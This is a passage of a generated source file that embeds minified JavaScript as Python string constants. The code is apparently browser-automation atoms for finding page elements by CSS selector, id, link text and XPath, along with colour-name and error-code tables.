".width-a);f=Math.min(f.height,e.height-b);e=new O(a+e.left,b+e.top,c,f)"\
"}return{r:d,rect:e||new O(0,0,0,0)}}\nfunction Za(a){var b=a.shape.toLo"\
"werCase();a=a.coords.split(\",\");if(\"rect\"==b&&4==a.length){var b=a["\
"0],c=a[1];return new O(b,c,a[2]-b,a[3]-c)}if(\"circle\"==b&&3==a.length"\
")return b=a[2],new O(a[0]-b,a[1]-b,2*b,2*b);if(\"poly\"==b&&2<a.length)"\
"{for(var b=a[0],c=a[1],d=b,e=c,f=2;f+1<a.length;f+=2)b=Math.min(b,a[f])"\
",d=Math.max(d,a[f]),c=Math.min(c,a[f+1]),e=Math.max(e,a[f+1]);return ne"\
"w O(b,c,d-b,e-c)}return new O(0,0,0,0)}function $a(a){return a.replace("\
"/^[^\\S\\xa0]+|[^\\S\\xa0]+$/g,\"\")}\nfunction bb(a){var b=[];cb(a,b);"\
"var c=b;a=c.length;for(var b=Array(a),c=l(c)?c.split(\"\"):c,d=0;d<a;d+"\
"+)d in c&&(b[d]=$a.call(void 0,c[d]));return $a(b.join(\"\\n\")).replac"\
"e(/\\xa0/g,\" \")}\nfunction cb(a,b){if(Q(a,\"BR\"))b.push(\"\");else{v"\
"ar c=Q(a,\"TD\"),d=T(a,\"display\"),e=!c&&!t(db,d),f=void 0!=a.previous"\
"ElementSibling?a.previousElementSibling:ma(a.previousSibling),f=f?T(f,"\
"\"display\"):\"\",g=T(a,\"float\")||T(a,\"cssFloat\")||T(a,\"styleFloat"\
"\");!e||(\"run-in\"==f&&\"none\"==g||/^[\\s\\xa0]*$/.test(b[b.length-1]"\
"||\"\"))||b.push(\"\");var q=Va(a),m=null,B=null;q&&(m=T(a,\"white-spac"\
"e\"),B=T(a,\"text-transform\"));r(a.childNodes,function(a){a.nodeType=="\
"ka&&q?eb(a,b,m,B):Q(a)&&cb(a,b)});f=b[b.length-1]||\"\";!c&&\n\"table-c"\
"ell\"!=d||(!f||ca(f))||(b[b.length-1]+=\" \");e&&(\"run-in\"!=d&&!/^["\
"\\s\\xa0]*$/.test(f))&&b.push(\"\")}}var db=\"inline inline-block inlin"\
"e-table none table-cell table-column table-column-group\".split(\" \");"\
"\nfunction eb(a,b,c,d){a=a.nodeValue.replace(/\\u200b/g,\"\");a=a.repla"\
"ce(/(\\r\\n|\\r|\\n)/g,\"\\n\");if(\"normal\"==c||\"nowrap\"==c)a=a.rep"\
"lace(/\\n/g,\" \");a=\"pre\"==c||\"pre-wrap\"==c?a.replace(/[ \\f\\t\\v"\
"\\u2028\\u2029]/g,\"\\u00a0\"):a.replace(/[\\ \\f\\t\\v\\u2028\\u2029]+"\
"/g,\" \");\"capitalize\"==d?a=a.replace(/(^|\\s)(\\S)/g,function(a,b,c)"\
"{return b+c.toUpperCase()}):\"uppercase\"==d?a=a.toUpperCase():\"lowerc"\
"ase\"==d&&(a=a.toLowerCase());c=b.pop()||\"\";ca(c)&&0==a.lastIndexOf("\
"\" \",0)&&(a=a.substr(1));b.push(c+a)}\nfunction Xa(a){var b=1,c=T(a,\""\
"opacity\");c&&(b=Number(c));(a=S(a))&&(b*=Xa(a));return b};var W={},X={"\
"};W.v=function(a,b,c){var d;try{d=C.d(\"a\",b)}catch(e){d=z(w(b),\"A\","\
"null,b)}return ha(d,function(b){b=bb(b);return c&&-1!=b.indexOf(a)||b=="\
"a})};W.s=function(a,b,c){var d;try{d=C.d(\"a\",b)}catch(e){d=z(w(b),\"A"\
"\",null,b)}return s(d,function(b){b=bb(b);return c&&-1!=b.indexOf(a)||b"\
"==a})};W.c=function(a,b){return W.v(a,b,!1)};W.d=function(a,b){return W"\
".s(a,b,!1)};X.c=function(a,b){return W.v(a,b,!0)};X.d=function(a,b){ret"\
"urn W.s(a,b,!0)};var fb={c:function(a,b){return b.getElementsByTagName("\
"a)[0]||null},d:function(a,b){return b.getElementsByTagName(a)}};var gb="\
"{className:A,\"class name\":A,css:C,\"css selector\":C,id:{c:function(a"\
",b){var c=w(b),d=l(a)?c.j.getElementById(a):a;if(!d)return null;if(R(d,"\
"\"id\")==a&&y(b,d))return d;c=z(c,\"*\");return ha(c,function(c){return"\
" R(c,\"id\")==a&&y(b,c)})},d:function(a,b){var c=z(w(b),\"*\",null,b);r"\
"eturn s(c,function(b){return R(b,\"id\")==a})}},linkText:W,\"link text"\
"\":W,name:{c:function(a,b){var c=z(w(b),\"*\",null,b);return ha(c,funct"\
"ion(b){return R(b,\"name\")==a})},d:function(a,b){var c=z(w(b),\"*\",nu"\
"ll,b);return s(c,function(b){return R(b,\n\"name\")==a})}},partialLinkT"\
"ext:X,\"partial link text\":X,tagName:fb,\"tag name\":fb,xpath:N};funct"\
"ion hb(a,b){var c;a:{for(c in a)if(a.hasOwnProperty(c))break a;c=null}i"\
"f(c){var d=gb[c];if(d&&n(d.c))return d.c(a[c],b||ba.document)}throw Err"\
"or(\"Unsupported locator strategy: \"+c);}var Y=[\"_\"],Z=k;Y[0]in Z||!"\
"Z.execScript||Z.execScript(\"var \"+Y[0]);for(var $;Y.length&&($=Y.shif"\
"t());)Y.length||void 0===hb?Z=Z[$]?Z[$]:Z[$]={}:Z[$]=hb;; return this._"\
".apply(null,arguments);}.apply({navigator:typeof window!=undefined?wind"\
"ow.navigator:null,document:typeof window!=undefined?window.document:nul"\
"l}, arguments);}"
FIND_ELEMENTS = \
"function(){return function(){function h(a){return function(){return a}}"\
"var k=this;\nfunction aa(a){var b=typeof a;if(\"object\"==b)if(a){if(a "\
"instanceof Array)return\"array\";if(a instanceof Object)return b;var c="\
"Object.prototype.toString.call(a);if(\"[object Window]\"==c)return\"obj"\
"ect\";if(\"[object Array]\"==c||\"number\"==typeof a.length&&\"undefine"\
"d\"!=typeof a.splice&&\"undefined\"!=typeof a.propertyIsEnumerable&&!a."\
"propertyIsEnumerable(\"splice\"))return\"array\";if(\"[object Function]"\
"\"==c||\"undefined\"!=typeof a.call&&\"undefined\"!=typeof a.propertyIs"\
"Enumerable&&!a.propertyIsEnumerable(\"call\"))return\"function\"}else r"\
"eturn\"null\";\nelse if(\"function\"==b&&\"undefined\"==typeof a.call)r"\
"eturn\"object\";return b}function l(a){return\"string\"==typeof a}funct"\
"ion n(a){return\"function\"==aa(a)};var ba=window;function ca(a){var b="\
"a.length-1;return 0<=b&&a.indexOf(\" \",b)==b}function p(a){return a.re"\
"place(/^[\\s\\xa0]+|[\\s\\xa0]+$/g,\"\")}function da(a){return String(a"\
").replace(/\\-([a-z])/g,function(a,c){return c.toUpperCase()})};var ea="\
"Array.prototype;function r(a,b){for(var c=a.length,d=l(a)?a.split(\"\")"\
":a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}function s(a,b){for(var "\
"c=a.length,d=[],e=0,f=l(a)?a.split(\"\"):a,g=0;g<c;g++)if(g in f){var q"\
"=f[g];b.call(void 0,q,g,a)&&(d[e++]=q)}return d}function fa(a,b){if(a.r"\
"educe)return a.reduce(b,\"\");var c=\"\";r(a,function(d,e){c=b.call(voi"\
"d 0,c,d,e,a)});return c}function ga(a,b){for(var c=a.length,d=l(a)?a.sp"\
"lit(\"\"):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return!0;ret"\
"urn!1}\nfunction ha(a,b){var c;a:{c=a.length;for(var d=l(a)?a.split(\""\
"\"):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a)){c=e;break a}c=-1}"\
"return 0>c?null:l(a)?a.charAt(c):a[c]}function t(a,b){var c;a:if(l(a))c"\
"=l(b)&&1==b.length?a.indexOf(b,0):-1;else{for(c=0;c<a.length;c++)if(c i"\
"n a&&a[c]===b)break a;c=-1}return 0<=c}function ia(a,b,c){return 2>=arg"\
"uments.length?ea.slice.call(a,b):ea.slice.call(a,b,c)};var ja;function "\
"u(a,b){this.x=void 0!==a?a:0;this.y=void 0!==b?b:0}u.prototype.toString"\
"=function(){return\"(\"+this.x+\", \"+this.y+\")\"};u.prototype.ceil=fu"\
"nction(){this.x=Math.ceil(this.x);this.y=Math.ceil(this.y);return this}"\
";u.prototype.floor=function(){this.x=Math.floor(this.x);this.y=Math.flo"\
"or(this.y);return this};u.prototype.round=function(){this.x=Math.round("\
"this.x);this.y=Math.round(this.y);return this};function v(a,b){this.wid"\
"th=a;this.height=b}v.prototype.toString=function(){return\"(\"+this.wid"\
"th+\" x \"+this.height+\")\"};v.prototype.ceil=function(){this.width=Ma"\
"th.ceil(this.width);this.height=Math.ceil(this.height);return this};v.p"\
"rototype.floor=function(){this.width=Math.floor(this.width);this.height"\
"=Math.floor(this.height);return this};v.prototype.round=function(){this"\
".width=Math.round(this.width);this.height=Math.round(this.height);retur"\
"n this};var ka=3;function w(a){return a?new la(x(a)):ja||(ja=new la)}fu"\
"nction ma(a){for(;a&&1!=a.nodeType;)a=a.previousSibling;return a}functi"\
"on y(a,b){if(a.contains&&1==b.nodeType)return a==b||a.contains(b);if(\""\
"undefined\"!=typeof a.compareDocumentPosition)return a==b||Boolean(a.co"\
"mpareDocumentPosition(b)&16);for(;b&&a!=b;)b=b.parentNode;return b==a}"\
"\nfunction na(a,b){if(a==b)return 0;if(a.compareDocumentPosition)return"\
" a.compareDocumentPosition(b)&2?1:-1;if(\"sourceIndex\"in a||a.parentNo"\
"de&&\"sourceIndex\"in a.parentNode){var c=1==a.nodeType,d=1==b.nodeType"\
";if(c&&d)return a.sourceIndex-b.sourceIndex;var e=a.parentNode,f=b.pare"\
"ntNode;return e==f?oa(a,b):!c&&y(e,b)?-1*pa(a,b):!d&&y(f,a)?pa(b,a):(c?"\
"a.sourceIndex:e.sourceIndex)-(d?b.sourceIndex:f.sourceIndex)}d=x(a);c=d"\
".createRange();c.selectNode(a);c.collapse(!0);d=d.createRange();d.selec"\
"tNode(b);d.collapse(!0);\nreturn c.compareBoundaryPoints(k.Range.START_"\
"TO_END,d)}function pa(a,b){var c=a.parentNode;if(c==b)return-1;for(var "\
"d=b;d.parentNode!=c;)d=d.parentNode;return oa(d,a)}function oa(a,b){for"\
"(var c=b;c=c.previousSibling;)if(c==a)return-1;return 1}function x(a){r"\
"eturn 9==a.nodeType?a:a.ownerDocument||a.document}function qa(a,b){a=a."\
"parentNode;for(var c=0;a;){if(b(a))return a;a=a.parentNode;c++}return n"\
"ull}function la(a){this.j=a||k.document||document}\nfunction z(a,b,c,d)"\
"{a=d||a.j;b=b&&\"*\"!=b?b.toUpperCase():\"\";if(a.querySelectorAll&&a.q"\
"uerySelector&&(b||c))c=a.querySelectorAll(b+(c?\".\"+c:\"\"));else if(c"\
"&&a.getElementsByClassName)if(a=a.getElementsByClassName(c),b){d={};for"\
"(var e=0,f=0,g;g=a[f];f++)b==g.nodeName&&(d[e++]=g);d.length=e;c=d}else"\
" c=a;else if(a=a.getElementsByTagName(b||\"*\"),c){d={};for(f=e=0;g=a[f"\
"];f++)b=g.className,\"function\"==typeof b.split&&t(b.split(/\\s+/),c)&"\
"&(d[e++]=g);d.length=e;c=d}else c=a;return c}\nfunction ra(a){var b=a.j"\
";a=b.body;b=b.parentWindow||b.defaultView;return new u(b.pageXOffset||a"\
".scrollLeft,b.pageYOffset||a.scrollTop)}la.prototype.contains=y;var A={"\
"n:function(a){return!(!a.querySelectorAll||!a.querySelector)},e:functio"\
"n(a,b){if(!a)throw Error(\"No class name specified\");a=p(a);if(1<a.spl"\
"it(/\\s+/).length)throw Error(\"Compound class names not permitted\");i"\
"f(A.n(b))return b.querySelector(\".\"+a.replace(/\\./g,\"\\\\.\"))||nul"\
"l;var c=z(w(b),\"*\",a,b);return c.length?c[0]:null},c:function(a,b){if"\
"(!a)throw Error(\"No class name specified\");a=p(a);if(1<a.split(/\\s+/"\
").length)throw Error(\"Compound class names not permitted\");return A.n"\
"(b)?b.querySelectorAll(\".\"+\na.replace(/\\./g,\"\\\\.\")):z(w(b),\"*"\
"\",a,b)}};var C={e:function(a,b){n(b.querySelector);if(!a)throw Error("\
"\"No selector specified\");a=p(a);var c=b.querySelector(a);return c&&1="\
"=c.nodeType?c:null},c:function(a,b){n(b.querySelectorAll);if(!a)throw E"\
"rror(\"No selector specified\");a=p(a);return b.querySelectorAll(a)}};v"\
"ar sa={aliceblue:\"#f0f8ff\",antiquewhite:\"#faebd7\",aqua:\"#00ffff\","\
"aquamarine:\"#7fffd4\",azure:\"#f0ffff\",beige:\"#f5f5dc\",bisque:\"#ff"\
"e4c4\",black:\"#000000\",blanchedalmond:\"#ffebcd\",blue:\"#0000ff\",bl"\
"ueviolet:\"#8a2be2\",brown:\"#a52a2a\",burlywood:\"#deb887\",cadetblue:"\
"\"#5f9ea0\",chartreuse:\"#7fff00\",chocolate:\"#d2691e\",coral:\"#ff7f5"\
"0\",cornflowerblue:\"#6495ed\",cornsilk:\"#fff8dc\",crimson:\"#dc143c\""\
",cyan:\"#00ffff\",darkblue:\"#00008b\",darkcyan:\"#008b8b\",darkgoldenr"\
"od:\"#b8860b\",darkgray:\"#a9a9a9\",darkgreen:\"#006400\",\ndarkgrey:\""\
"#a9a9a9\",darkkhaki:\"#bdb76b\",darkmagenta:\"#8b008b\",darkolivegreen:"\
"\"#556b2f\",darkorange:\"#ff8c00\",darkorchid:\"#9932cc\",darkred:\"#8b"\
"0000\",darksalmon:\"#e9967a\",darkseagreen:\"#8fbc8f\",darkslateblue:\""\
"#483d8b\",darkslategray:\"#2f4f4f\",darkslategrey:\"#2f4f4f\",darkturqu"\
"oise:\"#00ced1\",darkviolet:\"#9400d3\",deeppink:\"#ff1493\",deepskyblu"\
"e:\"#00bfff\",dimgray:\"#696969\",dimgrey:\"#696969\",dodgerblue:\"#1e9"\
"0ff\",firebrick:\"#b22222\",floralwhite:\"#fffaf0\",forestgreen:\"#228b"\
"22\",fuchsia:\"#ff00ff\",gainsboro:\"#dcdcdc\",\nghostwhite:\"#f8f8ff\""\
",gold:\"#ffd700\",goldenrod:\"#daa520\",gray:\"#808080\",green:\"#00800"\
"0\",greenyellow:\"#adff2f\",grey:\"#808080\",honeydew:\"#f0fff0\",hotpi"\
"nk:\"#ff69b4\",indianred:\"#cd5c5c\",indigo:\"#4b0082\",ivory:\"#fffff0"\
"\",khaki:\"#f0e68c\",lavender:\"#e6e6fa\",lavenderblush:\"#fff0f5\",law"\
"ngreen:\"#7cfc00\",lemonchiffon:\"#fffacd\",lightblue:\"#add8e6\",light"\
"coral:\"#f08080\",lightcyan:\"#e0ffff\",lightgoldenrodyellow:\"#fafad2"\
"\",lightgray:\"#d3d3d3\",lightgreen:\"#90ee90\",lightgrey:\"#d3d3d3\",l"\
"ightpink:\"#ffb6c1\",lightsalmon:\"#ffa07a\",\nlightseagreen:\"#20b2aa"\
"\",lightskyblue:\"#87cefa\",lightslategray:\"#778899\",lightslategrey:"\
"\"#778899\",lightsteelblue:\"#b0c4de\",lightyellow:\"#ffffe0\",lime:\"#"\
"00ff00\",limegreen:\"#32cd32\",linen:\"#faf0e6\",magenta:\"#ff00ff\",ma"\
"roon:\"#800000\",mediumaquamarine:\"#66cdaa\",mediumblue:\"#0000cd\",me"\
"diumorchid:\"#ba55d3\",mediumpurple:\"#9370db\",mediumseagreen:\"#3cb37"\
"1\",mediumslateblue:\"#7b68ee\",mediumspringgreen:\"#00fa9a\",mediumtur"\
"quoise:\"#48d1cc\",mediumvioletred:\"#c71585\",midnightblue:\"#191970\""\
",mintcream:\"#f5fffa\",mistyrose:\"#ffe4e1\",\nmoccasin:\"#ffe4b5\",nav"\
"ajowhite:\"#ffdead\",navy:\"#000080\",oldlace:\"#fdf5e6\",olive:\"#8080"\
"00\",olivedrab:\"#6b8e23\",orange:\"#ffa500\",orangered:\"#ff4500\",orc"\
"hid:\"#da70d6\",palegoldenrod:\"#eee8aa\",palegreen:\"#98fb98\",paletur"\
"quoise:\"#afeeee\",palevioletred:\"#db7093\",papayawhip:\"#ffefd5\",pea"\
"chpuff:\"#ffdab9\",peru:\"#cd853f\",pink:\"#ffc0cb\",plum:\"#dda0dd\",p"\
"owderblue:\"#b0e0e6\",purple:\"#800080\",red:\"#ff0000\",rosybrown:\"#b"\
"c8f8f\",royalblue:\"#4169e1\",saddlebrown:\"#8b4513\",salmon:\"#fa8072"\
"\",sandybrown:\"#f4a460\",seagreen:\"#2e8b57\",\nseashell:\"#fff5ee\",s"\
"ienna:\"#a0522d\",silver:\"#c0c0c0\",skyblue:\"#87ceeb\",slateblue:\"#6"\
"a5acd\",slategray:\"#708090\",slategrey:\"#708090\",snow:\"#fffafa\",sp"\
"ringgreen:\"#00ff7f\",steelblue:\"#4682b4\",tan:\"#d2b48c\",teal:\"#008"\
"080\",thistle:\"#d8bfd8\",tomato:\"#ff6347\",turquoise:\"#40e0d0\",viol"\
"et:\"#ee82ee\",wheat:\"#f5deb3\",white:\"#ffffff\",whitesmoke:\"#f5f5f5"\
"\",yellow:\"#ffff00\",yellowgreen:\"#9acd32\"};var ta=\"background-colo"\
"r border-top-color border-right-color border-bottom-color border-left-c"\
"olor color outline-color\".split(\" \"),ua=/#([0-9a-fA-F])([0-9a-fA-F])"\
"([0-9a-fA-F])/;function va(a){if(!wa.test(a))throw Error(\"'\"+a+\"' is"\
" not a valid hex color\");4==a.length&&(a=a.replace(ua,\"#$1$1$2$2$3$3"\
"\"));return a.toLowerCase()}var wa=/^#(?:[0-9a-f]{3}){1,2}$/i,xa=/^(?:r"\
"gba)?\\((\\d{1,3}),\\s?(\\d{1,3}),\\s?(\\d{1,3}),\\s?(0|1|0\\.\\d*)\\)$"\
"/i;\nfunction ya(a){var b=a.match(xa);if(b){a=Number(b[1]);var c=Number"\
"(b[2]),d=Number(b[3]),b=Number(b[4]);if(0<=a&&255>=a&&0<=c&&255>=c&&0<="\
"d&&255>=d&&0<=b&&1>=b)return[a,c,d,b]}return[]}var za=/^(?:rgb)?\\((0|["\
"1-9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2})\\)$/i;functio"\
"n Aa(a){var b=a.match(za);if(b){a=Number(b[1]);var c=Number(b[2]),b=Num"\
"ber(b[3]);if(0<=a&&255>=a&&0<=c&&255>=c&&0<=b&&255>=b)return[a,c,b]}ret"\
"urn[]};function D(a,b){this.code=a;this.state=Ba[a]||Ca;this.message=b|"\
"|\"\";var c=this.state.replace(/((?:^|\\s+)[a-z])/g,function(a){return "\
"a.toUpperCase().replace(/^[\\s\\xa0]+/g,\"\")}),d=c.length-5;if(0>d||c."\
"indexOf(\"Error\",d)!=d)c+=\"Error\";this.name=c;c=Error(this.message);"\
"c.name=this.name;this.stack=c.stack||\"\"}(function(){var a=Error;funct"\
"ion b(){}b.prototype=a.prototype;D.P=a.prototype;D.prototype=new b})();"\
"\nvar Ca=\"unknown error\",Ba={15:\"element not selectable\",11:\"eleme"\
"nt not visible\",31:\"ime engine activation failed\",30:\"ime not avail"\
"able\",24:\"invalid cookie domain\",29:\"invalid element coordinates\","\
"12:\"invalid element state\",32:\"invalid selector\",51:\"invalid selec"\
"tor\",52:\"invalid selector\",17:\"javascript error\",405:\"unsupported"\
" operation\",34:\"move target out of bounds\",27:\"no such alert\",7:\""\
"no such element\",8:\"no such frame\",23:\"no such window\",28:\"script"\
" timeout\",33:\"session not created\",10:\"stale element reference\",\n"\
"0:\"success\",21:\"timeout\",25:\"unable to set cookie\",26:\"unexpecte"\
"d alert open\"};Ba[13]=Ca;Ba[9]=\"unknown command\";D.prototype.toStrin"\
"g=function(){return this.name+\": \"+this.message};function E(a){var b="\
"null,c=a.nodeType;1==c&&(b=a.textContent,b=void 0==b||null==b?a.innerTe"\
"xt:b,b=void 0==b||null==b?\"\":b);if(\"string\"!=typeof b)if(9==c||1==c"\
"){a=9==c?a.documentElement:a.firstChild;for(var c=0,d=[],b=\"\";a;){do "\
"1!=a.nodeType&&(b+=a.nodeValue),d[c++]=a;while(a=a.firstChild);for(;c&&"\
"!(a=d[--c].nextSibling););}}else b=a.nodeValue;return\"\"+b}\nfunction "\
"F(a,b,c){if(null===b)return!0;try{if(!a.getAttribute)return!1}catch(d){"\
"return!1}return null==c?!!a.getAttribute(b):a.getAttribute(b,2)==c}func"\
"tion G(a,b,c,d,e){return Da.call(null,a,b,l(c)?c:null,l(d)?d:null,e||ne"\
"w H)}\nfunction Da(a,b,c,d,e){b.getElementsByName&&d&&\"name\"==c?(b=b."\
"getElementsByName(d),r(b,function(b){a.matches(b)&&e.add(b)})):b.getEle"\
"mentsByClassName&&d&&\"class\"==c?(b=b.getElementsByClassName(d),r(b,fu"\
"nction(b){b.className==d&&a.matches(b)&&e.add(b)})):b.getElementsByTagN"\
"ame&&(b=b.getElementsByTagName(a.getName()),r(b,function(a){F(a,c,d)&&e"\
".add(a)}));return e}function Ea(a,b,c,d,e){for(b=b.firstChild;b;b=b.nex"\
"tSibling)F(b,c,d)&&a.matches(b)&&e.add(b);return e};function H(){this.f"\
"=this.d=null;this.k=0}function Fa(a){this.t=a;this.next=this.m=null}H.p"\
"rototype.unshift=function(a){a=new Fa(a);a.next=this.d;this.f?this.d.m="\
"a:this.d=this.f=a;this.d=a;this.k++};H.prototype.add=function(a){a=new "\
"Fa(a);a.m=this.f;this.d?this.f.next=a:this.d=this.f=a;this.f=a;this.k++"\
"};function Ga(a){return(a=a.d)?a.t:null}function I(a){return new Ha(a,!"\
"1)}function Ha(a,b){this.M=a;this.p=(this.u=b)?a.f:a.d;this.B=null}\nHa"\
".prototype.next=function(){var a=this.p;if(null==a)return null;var b=th"\
"is.B=a;this.p=this.u?a.m:a.next;return b.t};function J(a,b,c,d,e){b=b.e"\
"valuate(d);c=c.evaluate(d);var f;if(b instanceof H&&c instanceof H){e=I"\
"(b);for(d=e.next();d;d=e.next())for(b=I(c),f=b.next();f;f=b.next())if(a"\
"(E(d),E(f)))return!0;return!1}if(b instanceof H||c instanceof H){b inst"\
"anceof H?e=b:(e=c,c=b);e=I(e);b=typeof c;for(d=e.next();d;d=e.next()){s"\
"witch(b){case \"number\":d=+E(d);break;case \"boolean\":d=!!E(d);break;"\
"case \"string\":d=E(d);break;default:throw Error(\"Illegal primitive ty"\
"pe for comparison.\");}if(a(d,c))return!0}return!1}return e?\n\"boolean"\
"\"==typeof b||\"boolean\"==typeof c?a(!!b,!!c):\"number\"==typeof b||\""\
"number\"==typeof c?a(+b,+c):a(b,c):a(+b,+c)}function Ia(a,b,c,d){this.C"\
"=a;this.O=b;this.A=c;this.i=d}Ia.prototype.toString=function(){return t"\
"his.C};var Ja={};function K(a,b,c,d){if(a in Ja)throw Error(\"Binary op"\
"erator already created: \"+a);a=new Ia(a,b,c,d);Ja[a.toString()]=a}K(\""\
"div\",6,1,function(a,b,c){return a.b(c)/b.b(c)});K(\"mod\",6,1,function"\
"(a,b,c){return a.b(c)%b.b(c)});K(\"*\",6,1,function(a,b,c){return a.b(c"\
")*b.b(c)});\nK(\"+\",5,1,function(a,b,c){return a.b(c)+b.b(c)});K(\"-\""\
",5,1,function(a,b,c){return a.b(c)-b.b(c)});K(\"<\",4,2,function(a,b,c)"\
"{return J(function(a,b){return a<b},a,b,c)});K(\">\",4,2,function(a,b,c"\
"){return J(function(a,b){return a>b},a,b,c)});K(\"<=\",4,2,function(a,b"\
",c){return J(function(a,b){return a<=b},a,b,c)});K(\">=\",4,2,function("\
"a,b,c){return J(function(a,b){return a>=b},a,b,c)});K(\"=\",3,2,functio"\
"n(a,b,c){return J(function(a,b){return a==b},a,b,c,!0)});\nK(\"!=\",3,2"\
",function(a,b,c){return J(function(a,b){return a!=b},a,b,c,!0)});K(\"an"\
"d\",2,2,function(a,b,c){return a.h(c)&&b.h(c)});K(\"or\",1,2,function(a"\
",b,c){return a.h(c)||b.h(c)});function Ka(a,b,c,d,e,f,g,q,m){this.l=a;t"\
"his.A=b;this.L=c;this.K=d;this.J=e;this.i=f;this.I=g;this.H=void 0!==q?"\
"q:g;this.N=!!m}Ka.prototype.toString=function(){return this.l};var La={"\
"};function L(a,b,c,d,e,f,g,q){if(a in La)throw Error(\"Function already"\
" created: \"+a+\".\");La[a]=new Ka(a,b,c,d,!1,e,f,g,q)}L(\"boolean\",2,"\
"!1,!1,function(a,b){return b.h(a)},1);L(\"ceiling\",1,!1,!1,function(a,"\
"b){return Math.ceil(b.b(a))},1);\nL(\"concat\",3,!1,!1,function(a,b){va"\
"r c=ia(arguments,1);return fa(c,function(b,c){return b+c.a(a)})},2,null"\
");L(\"contains\",2,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a);return-1!=b."\
"indexOf(a)},2);L(\"count\",1,!1,!1,function(a,b){return b.evaluate(a).k"\
"},1,1,!0);L(\"false\",2,!1,!1,h(!1),0);L(\"floor\",1,!1,!1,function(a,b"\
"){return Math.floor(b.b(a))},1);\nL(\"id\",4,!1,!1,function(a,b){var c="\
"a.g(),d=9==c.nodeType?c:c.ownerDocument,c=b.a(a).split(/\\s+/),e=[];r(c"\
",function(a){(a=d.getElementById(a))&&!t(e,a)&&e.push(a)});e.sort(na);v"\
"ar f=new H;r(e,function(a){f.add(a)});return f},1);L(\"lang\",2,!1,!1,h"\
"(!1),1);L(\"last\",1,!0,!1,function(a){if(1!=arguments.length)throw Err"\
"or(\"Function last expects ()\");return a.F()},0);L(\"local-name\",3,!1"\
",!0,function(a,b){var c=b?Ga(b.evaluate(a)):a.g();return c?c.nodeName.t"\
"oLowerCase():\"\"},0,1,!0);\nL(\"name\",3,!1,!0,function(a,b){var c=b?G"\
"a(b.evaluate(a)):a.g();return c?c.nodeName.toLowerCase():\"\"},0,1,!0);"\
"L(\"namespace-uri\",3,!0,!1,h(\"\"),0,1,!0);L(\"normalize-space\",3,!1,"\
"!0,function(a,b){return(b?b.a(a):E(a.g())).replace(/[\\s\\xa0]+/g,\" \""\
").replace(/^\\s+|\\s+$/g,\"\")},0,1);L(\"not\",2,!1,!1,function(a,b){re"\
"turn!b.h(a)},1);L(\"number\",1,!1,!0,function(a,b){return b?b.b(a):+E(a"\
".g())},0,1);L(\"position\",1,!0,!1,function(a){return a.G()},0);L(\"rou"\
"nd\",1,!1,!1,function(a,b){return Math.round(b.b(a))},1);\nL(\"starts-w"\
"ith\",2,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a);return 0==b.lastIndexOf"\
"(a,0)},2);L(\"string\",3,!1,!0,function(a,b){return b?b.a(a):E(a.g())},"\
"0,1);L(\"string-length\",1,!1,!0,function(a,b){return(b?b.a(a):E(a.g())"\
").length},0,1);\nL(\"substring\",3,!1,!1,function(a,b,c,d){c=c.b(a);if("\
"isNaN(c)||Infinity==c||-Infinity==c)return\"\";d=d?d.b(a):Infinity;if(i"\
"sNaN(d)||-Infinity===d)return\"\";c=Math.round(c)-1;var e=Math.max(c,0)"\
";a=b.a(a);if(Infinity==d)return a.substring(e);b=Math.round(d);return a"\
".substring(e,c+b)},2,3);L(\"substring-after\",3,!1,!1,function(a,b,c){b"\
"=b.a(a);a=c.a(a);c=b.indexOf(a);return-1==c?\"\":b.substring(c+a.length"\
")},2);\nL(\"substring-before\",3,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a"\
");a=b.indexOf(a);return-1==a?\"\":b.substring(0,a)},2);L(\"sum\",1,!1,!"\
"1,function(a,b){for(var c=I(b.evaluate(a)),d=0,e=c.next();e;e=c.next())"\
"d+=+E(e);return d},1,1,!0);L(\"translate\",3,!1,!1,function(a,b,c,d){b="\
"b.a(a);c=c.a(a);var e=d.a(a);a=[];for(d=0;d<c.length;d++){var f=c.charA"\
"t(d);f in a||(a[f]=e.charAt(d))}c=\"\";for(d=0;d<b.length;d++)f=b.charA"\
"t(d),c+=f in a?a[f]:f;return c},3);L(\"true\",2,!1,!1,h(!0),0);function"\
" Ma(a,b,c,d){this.l=a;this.D=b;this.u=c;this.Q=d}Ma.prototype.toString="\
"function(){return this.l};var Na={};function M(a,b,c,d){if(a in Na)thro"\
"w Error(\"Axis already created: \"+a);Na[a]=new Ma(a,b,c,!!d)}M(\"ances"\
"tor\",function(a,b){for(var c=new H,d=b;d=d.parentNode;)a.matches(d)&&c"\
".unshift(d);return c},!0);M(\"ancestor-or-self\",function(a,b){var c=ne"\
"w H,d=b;do a.matches(d)&&c.unshift(d);while(d=d.parentNode);return c},!"\
"0);\nM(\"attribute\",function(a,b){var c=new H,d=a.getName(),e=b.attrib"\
"utes;if(e)if(\"*\"==d)for(var d=0,f;f=e[d];d++)c.add(f);else(f=e.getNam"\
"edItem(d))&&c.add(f);return c},!1);M(\"child\",function(a,b,c,d,e){retu"\
"rn Ea.call(null,a,b,l(c)?c:null,l(d)?d:null,e||new H)},!1,!0);M(\"desce"\
"ndant\",G,!1,!0);M(\"descendant-or-self\",function(a,b,c,d){var e=new H"\
";F(b,c,d)&&a.matches(b)&&e.add(b);return G(a,b,c,d,e)},!1,!0);\nM(\"fol"\
"lowing\",function(a,b,c,d){var e=new H;do for(var f=b;f=f.nextSibling;)"\
"F(f,c,d)&&a.matches(f)&&e.add(f),e=G(a,f,c,d,e);while(b=b.parentNode);r"\
"eturn e},!1,!0);M(\"following-sibling\",function(a,b){for(var c=new H,d"\
"=b;d=d.nextSibling;)a.matches(d)&&c.add(d);return c},!1);M(\"namespace"\
"\",function(){return new H},!1);M(\"parent\",function(a,b){var c=new H;"\
"if(9==b.nodeType)return c;if(2==b.nodeType)return c.add(b.ownerElement)"\
",c;var d=b.parentNode;a.matches(d)&&c.add(d);return c},!1);\nM(\"preced"\
"ing\",function(a,b,c,d){var e=new H,f=[];do f.unshift(b);while(b=b.pare"\
"ntNode);for(var g=1,q=f.length;g<q;g++){var m=[];for(b=f[g];b=b.previou"\
"sSibling;)m.unshift(b);for(var B=0,ab=m.length;B<ab;B++)b=m[B],F(b,c,d)"\
